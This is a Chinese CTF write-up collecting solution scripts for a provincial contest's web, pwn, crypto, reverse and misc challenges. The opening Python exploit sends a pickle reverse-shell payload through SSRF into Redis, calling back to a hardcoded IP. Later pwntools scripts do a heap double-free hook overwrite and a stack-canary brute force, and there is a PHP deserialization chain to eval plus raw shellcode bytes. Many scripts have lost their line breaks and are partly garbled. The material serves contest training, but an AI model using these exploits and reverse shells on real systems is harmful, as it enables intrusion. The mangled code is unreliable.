此篇只是记录一下给安徽省后面的 ctfer了解一下省赛的大概情况
决赛分组别了,我们来看看赛题质量
原题:/
清华校赛THUCTF2019 之 ComplexWeb | Clang裁缝店
#!/usr/bin/env python
# -- coding:utf-8 --
# Author: xuanxuan
# Date: 2019-10-13import cPickle
import requests
import os,time
import platformbase_url = ":7002"
server_ip = "183.172.81.163"
server_port = 8888
shellcode = ""def gen_shellcode():global shellcodeclass exp(object):def __reduce__(self):s = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("server_ip",server_port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"""return (os.system, (s,))e = exp()s = cPickle.dumps(e)shellcode = s.replace("n",'\n').replace(""","\"").replace("server_ip",server_ip).replace("server_port",str(server_port))# 需要本机可被目标机器寻址,之后可以手动优化shell: python -c "import pty;pty.spawn('/bin/bash')"def open_nc():myos = platform.platform()if "Darwin" in myos:f = open("nclocal.sh","w+")f.write("nc -l "+str(server_port)+"n")f.close()os.system("chmod +x nclocal.sh")os.system("open -a Terminal.app nclocal.sh")time.sleep(2)os.system("rm -rf nclocal.sh")elif "Linux" in myos:os.system("gnome-terminal -e 'bash -c "nc -l "+str(server_port)+""'")def attack():a = requests.session()r1 = a.post(base_url+'/login/', data = {'username':'xuan'})b = requests.session()r2 = b.post(base_url+'/login/', data = {'username':'bling'})mysession = r2.cookies['session'][0:36]payload = "127.0.0.1:6379?rnset "session:"+mysession+"" ""+shellcode+""rnpadding"a.post(base_url+'/download/',data = {'url':payload})b.get(base_url)if __name__ == '__main__':gen_shellcode()open_nc()attack()
直接for 然后每一位+48 转字母就行了
flag = ''
ip = [54,60,49,55,75,58,49,70,49,3,51,66,1,65,68,23,3,77]
for i in range(len(ip)):print(ip[i]+48)flag += chr(ip[i]+48)
print(flag)
flag{java3cr1qtG3}
N : 460657813884289609896372056585544172485318117026246263899744329237492701820627219556007788200590119136173895989001382151536006853823326382892363143604314518686388786002989248800814861248595075326277099645338694977097459168530898776007293695728101976069423971696524237755227187061418202849911479124793990722597
e : 354611102441307572056572181827925899198345350228753730931089393275463916544456626894245415096107834465778409532373187125318554614722599301791528916212839368121066035541008808261534500586023652767712271625785204280964688004680328300124849680477105302519377370092578107827116821391826210972320377614967547827619enc : 38230991316229399651823567590692301060044620412191737764632384680546256228451518238842965221394711848337832459443844446889468362154188214840736744657885858943810177675871991111466653158257191139605699916347308294995664530280816850482740530602254559123759121106338359220242637775919026933563326069449424391192
最基础的模版,不多说
import gmpy2
import libnumdef continuedFra(x, y):"""计算连分数:param x: 分子:param y: 分母:return: 连分数列表"""cf = []while y:cf.append(x // y)x, y = y, x % yreturn cf
def gradualFra(cf):"""计算传入列表最后的渐进分数:param cf: 连分数列表:return: 该列表最后的渐近分数"""numerator = 0denominator = 1for x in cf[::-1]:# 这里的渐进分数分子分母要分开numerator, denominator = denominator, x * denominator + numeratorreturn numerator, denominator
def solve_pq(a, b, c):"""使用韦达定理解出pq,x^2−(p+q)∗x+pq=0:param a:x^2的系数:param b:x的系数:param c:pq:return:p,q"""par = gmpy2.isqrt(b * b - 4 * a * c)return (-b + par) // (2 * a), (-b - par) // (2 * a)
def getGradualFra(cf):"""计算列表所有的渐近分数:param cf: 连分数列表:return: 该列表所有的渐近分数"""gf = []for i in range(1, len(cf) + 1):gf.append(gradualFra(cf[:i]))return gfdef wienerAttack(e, n):""":param e::param n::return: 私钥d"""cf = continuedFra(e, n)gf = getGradualFra(cf)for d, k in gf:if k == 0: continueif (e * d - 1) % k != 0:continuephi = (e * d - 1) // kp, q = solve_pq(1, n - phi + 1, n)if p * q == n:return dN = 460657813884289609896372056585544172485318117026246263899744329237492701820627219556007788200590119136173895989001382151536006853823326382892363143604314518686388786002989248800814861248595075326277099645338694977097459168530898776007293695728101976069423971696524237755227187061418202849911479124793990722597
e = 354611102441307572056572181827925899198345350228753730931089393275463916544456626894245415096107834465778409532373187125318554614722599301791528916212839368121066035541008808261534500586023652767712271625785204280964688004680328300124849680477105302519377370092578107827116821391826210972320377614967547827619c = 38230991316229399651823567590692301060044620412191737764632384680546256228451518238842965221394711848337832459443844446889468362154188214840736744657885858943810177675871991111466653158257191139605699916347308294995664530280816850482740530602254559123759121106338359220242637775919026933563326069449424391192
d=wienerAttack(e,N)
print(d)
m=pow(c, d, N)
print(libnum.n2s(m).decode())
8264667972294275017293339772371783322168822149471976834221082393409363691895
flag{Wien3r_4tt@ck_1s_3AsY}
mhno{162xxq6aw04iwa1817nc799895m2n2ox}
tenshineishandsome
带key的古典密码不多见
原题:新生赛山河ctf week1-Steganography
打开密码:12ercsxqwed909jk
图片1 的base64 图片二的备注
666run不出来(太菜了,做不出来)
run出来了 原题2020 第五空间“智能安全大赛 misc-run
1、附件里只有,尝试后缀改为zip(直接用7z解压一样),得到New Microsoft Word Document.docx和
运行得到tif
2、16进制编辑器发现用ps操作过 直接用PS打开
在tif最后发现:njCp1HJBPLVTxcMhUHDPwE7mPW
str = 'njCp1HJBPLVTxcMhUHDPwE7mPW'
res = ''
for i in range(1, len(str)+1):if i % 2 == 0:flag += chr(ord(str[i-1]) + 1)else:flag += chr(ord(str[i-1]) - 1)
print(flag)
flag{mkBq0IICOMUUwdLiTICQvF6nOX}
原题:攻防世界新手练习题
import base64def decode(encoded_message):s = base64.b64decode(encoded_message)original_message = ''for i in s:x = i - 16x = x ^ 32original_message += chr(x)return original_messagecorrect = 'XlNkVmtUI1MgXWBZXCFeKY+AaXNt'
decoded_flag = decode(correct)
print('Decoded flag:', decoded_flag)#Decoded flag: nctf{d3c0mpil1n9_PyC}
原题:2017-alexctf-catalyst-system
.html
cmp = [1441465642,251096121,-870437532,-944322827,647240698,638382323,282381039,-966334428,-58112612,605226810
]
xor = [0x42, 0x13, 0x27, 0x62, 0x41, 0x35, 0x6B, 0x0F, 0x7B, 0x46,0x3C, 0x3E, 0x67, 0x0C, 0x08, 0x59, 0x44, 0x72, 0x36, 0x05,0x0F, 0x15, 0x54, 0x43, 0x38, 0x17, 0x1D, 0x18, 0x08, 0x0E,0x5C, 0x31, 0x21, 0x16, 0x02, 0x09, 0x18, 0x14, 0x54, 0x59
]
rand = [0x684749,0x673ce537,0x7b4505e7,0x70a0b262,0x33d5253c,0x515a7675,0x596d7d5d,0x7cd29049,0x59e72db6,0x4654600d
]p = 0
L = b''for i in range(10):tmp = hex(cmp[i] + rand[i])[2:]while tmp:L += bytes([int(tmp[:2], base=16) ^ xor[p//4*4 + 3-p%4]])tmp = tmp[2:]p += 1LL = b''
while L:LL += L[:4][::-1]L = L[4:]
print(LL)
原题
#coding:utf-8
from pwn import *context.log_level='debug'
elfelf='./double_free'
elf=ELF(elfelf)
heap_base=0
libc_base=0
context.arch=elf.arch
gdb_text=''''''if len(sys.argv)==1 :io=process(elfelf)gdb_open=1libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]else :io=remote('node4.buuoj',)gdb_open=0libc=ELF('./libc-2.23.so')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')one_gadgaet=[0x45226,0x4527a,0xf0364,0xf1247]def gdb_attach(io,a):if gdb_open==1 :gdb.attach(io,a)def choice(a):io.sendlineafter('4. exitn',str(a))def add(a,b):choice(1)io.sendlineafter('sizen',str(a))io.sendafter('contentn',b)def show(a):choice(3)io.sendlineafter('n',str(a))def delete(a):choice(2)io.sendlineafter('n',str(a))add(0xf8,'aaaa')
add(0x68,'bbb')
add(0x68,'bbb')
delete(0)
show(0)libc_base=vuntil('x7f')[-6:]+'x00x00')-libc.sym['__malloc_hook']-88-0x10
libc.address=libc_base
bin_sh_addr=libc.search('/bin/shx00').next()
system_addr=libc.sym['system']
free_hook_addr=libc.sym['__free_hook']add(0xf8,'a')delete(1)
delete(2)
delete(1)add(0x68,p64(libc.sym['__malloc_hook']-0x23))
add(0x68,p64(libc.sym['__malloc_hook']-0x23))
add(0x68,p64(libc.sym['__malloc_hook']-0x23))
add(0x68,'x00'*0x13+p64(libc_base+one_gadgaet[2]))delete(0)
delete(0)success('libc_base:'+hex(libc_base))
success('heap_base:'+hex(heap_base))gdb_attach(io,gdb_text)
io.interactive()
原题
from pwn import *s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(str(delim), data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(str(delim), data)
r = lambda num :io.recv(num)
ru = lambda delims, drop=True :io.recvuntil(delims, drop)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'x00'))
uu64 = lambda data :u64(data.ljust(8,b'x00'))
ls = lambda data :log.success(data)binary = './c-canary'
libelf = ''context.arch = 'amd64'
context.log_level = 'debug'
inal = ['tmux','splitw','-h','-l','130']elf = ELF(binary)
#libc = ELF(libelf)bd = 0x01231
#gdb.attach(io)io = process(binary)
#io = remote('node1.anna.nssctf',28933)
pad = 0x64
canry = b'x00' # b'x00'
for i in range(7-4):for ch in range(0xff):lc = canry + p8(ch)tmp = b'A' * pad + lcru('welcomen')s(tmp)if b'recv sucess' vline():canry += p8(ch)breaktmp = b'A' * pad + canry + p64(0)+p32(0) + p32(0x804863B)
ru('welcomen')
s(tmp)#io = remote('node2.anna.nssctf',28003)io.interactive()
<?php
class good {protected $a;function __construct() {$this->a = new hello();}function __destruct() {$this->a->action();}
}class hello {function action() {echo "hello";}
}class shell {private $data;function action() {eval($this->data);}
}@unserialize($_GET['data']);
?>
构造一个链子:__destruct------shell类---------data赋值,命令执行
<?php
class good {protected $a;function __construct() {$this->a = new shell();}function __destruct() {$this->a->action();}
}class hello {function action() {echo "hello";}
}class shell {private $data;public function __construct(){$this->data = "phpinfo();";}function action() {eval($this->data);}
}$n = new good;
echo urlencode(serialize($n));
?>
0解有兴趣佬可以看看
<?php
error_reporting(0);
$file=$_GET["file"];
highlight_file(__FILE__);if(!is_array($file)){if (strpos(file_get_contents($file), "We1come_To_MyWeb")!==false){include($file);}else{echo "Give up!";}
}else{die("Give up Hacker!");
}?> Give up!
厨师一把梭
原题-攻防世界-easy_BlockCipher
from Crypto.Cipher import DESf = open('ciphertext', 'r')
ciphertext = f.read()
f.close()
IV = '13245678'KEY = "xE1xE1xE1xE1xF0xF0xF0xF0"
a = w(KEY, DES.MODE_OFB, IV)
plaintext = a.decrypt(ciphertext)
print(plaintext)
flag{_poor_single_dog_has_found_an_echo_from_it}
原题:攻防世界新手misc-坚持60s
flag{DajiDali_JinwanChiji}
原题-攻防世界re-babyre
current = [0x66,0x6D,0x63,0x64,0x7F,0x6B,0x37,0x64,0x3B,0x56,0x60,0x3B,0x6E,0x70]
for i in range(len(current)):print chr(current[i]^i),
flag{n1c3_j0b}
x6ax0bx58x99x52x66x68x2dx63x89xe7x68x2fx73x68x00x68x2fx62x69x6ex89xe3x52xe8x34x00x00x00x65x63x68x6fx20x5ax6dx78x68x5ax33x74x54x53x45x56x73x62x47x4ex76x5ax47x56x66x53x56x4ex66x63x32x39x66x51x32x39x76x62x48x30x4bx7cx62x61x73x65x36x34x20x2dx64x00x57x53x89xe1xcdx80
from pwn import *
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(str(delim), data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(str(delim), data)
r = lambda num :io.recv(num)
ru = lambda delims, drop=True :io.recvuntil(delims, drop)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'x00'))
uu64 = lambda data :u64(data.ljust(8,b'x00'))
#ls = lambda data :log.success(data)
ls = lambda s : log.success('